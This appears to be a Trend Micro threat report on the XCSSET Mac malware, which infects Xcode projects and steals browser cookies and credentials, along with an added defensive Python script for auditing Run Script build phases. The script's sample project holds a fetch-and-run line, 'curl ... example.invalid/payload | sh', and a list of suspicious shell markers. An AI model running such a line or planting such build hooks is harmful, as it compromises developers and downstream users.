XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits

By Trend Micro Mac Threat Response and Mobile Research Team

August 17, 2020

We have discovered an unusual infection related to Xcode developer projects. Upon further investigation, we discovered that a developer's Xcode project at large contained the source malware, which leads to a rabbit hole of malicious payloads. Most notable in our investigation is the discovery of two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, and another is used to abuse the development version of Safari.

This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.

This blog will summarize the findings of this threat, while its accompanying technical brief contains the full details of this attack. We detected the entry threat as TrojanSpy.MacOS.XCSSET.A and its command and control (C&C) related files as Backdoor.MacOS.XCSSET.A.

This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that, upon building, they run malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
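Because the build itself is what executes the injected code, the practical defensive check for a developer who pulls Xcode projects from GitHub or other shared sources is to review every Run Script build phase in `project.pbxproj` before building. The script below is an added example (not Trend Micro's code and not derived from the XCSSET samples); it assumes the standard `PBXShellScriptBuildPhase` object layout of Xcode's old-style plist project file, and the marker list it flags on is a generic review heuristic, not a list of XCSSET indicators. The embedded project fragment is constructed for the example.

```python
import re
import sys
from typing import Dict, List, Tuple

# Constructed sample fragment of a project.pbxproj (Xcode's old-style plist).
# Object IDs, names and scripts are made up for this example; the second phase
# stands in for a build step that fetches and runs code from the network.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        AB12CD34EF567890AB12CD34 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            inputPaths = (
            );
            name = "Run Script";
            outputPaths = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "swiftlint lint\n";
        };
        0011223344556677AABBCCDD /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -s http://example.invalid/payload | sh\n";
        };
/* End PBXShellScriptBuildPhase section */
'''

# One pbxproj object: 24-hex-digit ID, optional /* comment */, then a { ... } body.
# Build-phase bodies contain no nested "};", so a non-greedy match to the closing
# brace on its own line is enough for this object kind.
OBJECT_RE = re.compile(
    r'(?P<oid>[0-9A-F]{24})(?: /\* (?P<comment>[^*]*) \*/)? = \{(?P<body>.*?)\n\s*\};',
    re.DOTALL,
)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.DOTALL)
NAME_RE = re.compile(r'\bname = "?([^";]*)"?;')
SHELLPATH_RE = re.compile(r'shellPath = "?([^";]*)"?;')

# Assumption: generic markers that warrant a human look before building a project
# obtained from elsewhere. They are not XCSSET-specific indicators.
SUSPICIOUS_MARKERS = (
    "curl ", "wget ", "base64", "eval ", "osascript", "| sh", "| bash",
    "openssl enc", "/tmp/", "nohup",
)


def unescape_pbx(s: str) -> str:
    """Undo pbxproj string escaping: \\n, \\t, \\" and \\\\."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)


def extract_run_script_phases(pbxproj: str) -> List[Dict[str, str]]:
    """Return every PBXShellScriptBuildPhase with its decoded shell script."""
    phases = []
    for m in OBJECT_RE.finditer(pbxproj):
        body = m.group('body')
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue
        script_m = SCRIPT_RE.search(body)
        name_m = NAME_RE.search(body)
        path_m = SHELLPATH_RE.search(body)
        phases.append({
            'id': m.group('oid'),
            'name': name_m.group(1) if name_m else (m.group('comment') or ''),
            'shell': path_m.group(1) if path_m else '',
            'script': unescape_pbx(script_m.group(1)) if script_m else '',
        })
    return phases


def flag_suspicious(phases: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Pair each phase ID with the markers found in its script (empty hits are dropped)."""
    flagged = []
    for p in phases:
        hits = [marker for marker in SUSPICIOUS_MARKERS if marker in p['script']]
        if hits:
            flagged.append((p['id'], hits))
    return flagged


def audit_file(path: str) -> List[Tuple[str, List[str]]]:
    """Audit a real project.pbxproj on disk (assumed path argument)."""
    with open(path, encoding='utf-8') as f:
        return flag_suspicious(extract_run_script_phases(f.read()))


if __name__ == '__main__':
    # Usage: python audit_pbxproj.py [path/to/project.pbxproj]; defaults to the sample.
    text = open(sys.argv[1], encoding='utf-8').read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    phases = extract_run_script_phases(text)
    flagged = dict(flag_suspicious(phases))
    for p in phases:
        status = 'REVIEW ' + ','.join(flagged[p['id']]) if p['id'] in flagged else 'ok'
        print(f"{p['id']} {p['name']!r} [{p['shell']}] -> {status}")
        print('    ' + p['script'].rstrip().replace('\n', '\n    '))
```

Every Run Script phase is printed, not only the flagged ones: the marker list is a triage aid, and the point of the check is that a human reads each script before the first build, since a file-hash check on the repository cannot tell a legitimate build step from an injected one.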

Once present on an affected system, XCSSET is capable of the following behavior:

  • Using exploits, it abuses the existing Safari and other installed browsers to steal user data. In particular, it
    • Uses a vulnerability to read and dump Safari cookies
    • Uses the Safari development version to inject JavaScript backdoors onto websites via a Universal Cross-site Scripting (UXSS) attack
  • It steals information from the user's Evernote, Notes, Skype, Telegram, QQ, and WeChat apps
  • It takes screenshots of the user's current screen
  • It uploads files from the affected machines to the attacker's specified server
  • It encrypts files and shows a ransom note, if commanded by the server

The UXSS attack is theoretically capable of modifying almost every part of the user's browser experience as arbitrary JavaScript-injected code. These modifications include:

  • Modifying displayed websites
  • Modifying/replacing Bitcoin/cryptocurrency addresses
  • Stealing amoCRM, Apple ID, Google, Paypal, SIPMarket, and Yandex credentials
  • Stealing credit card information from the Apple Store
  • Blocking the user from changing passwords but also stealing newly modified passwords
  • Capturing screenshots of certain accessed sites

The method of distribution used can only be described as clever. Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.

Further details of this attack may be found in its related technical brief.
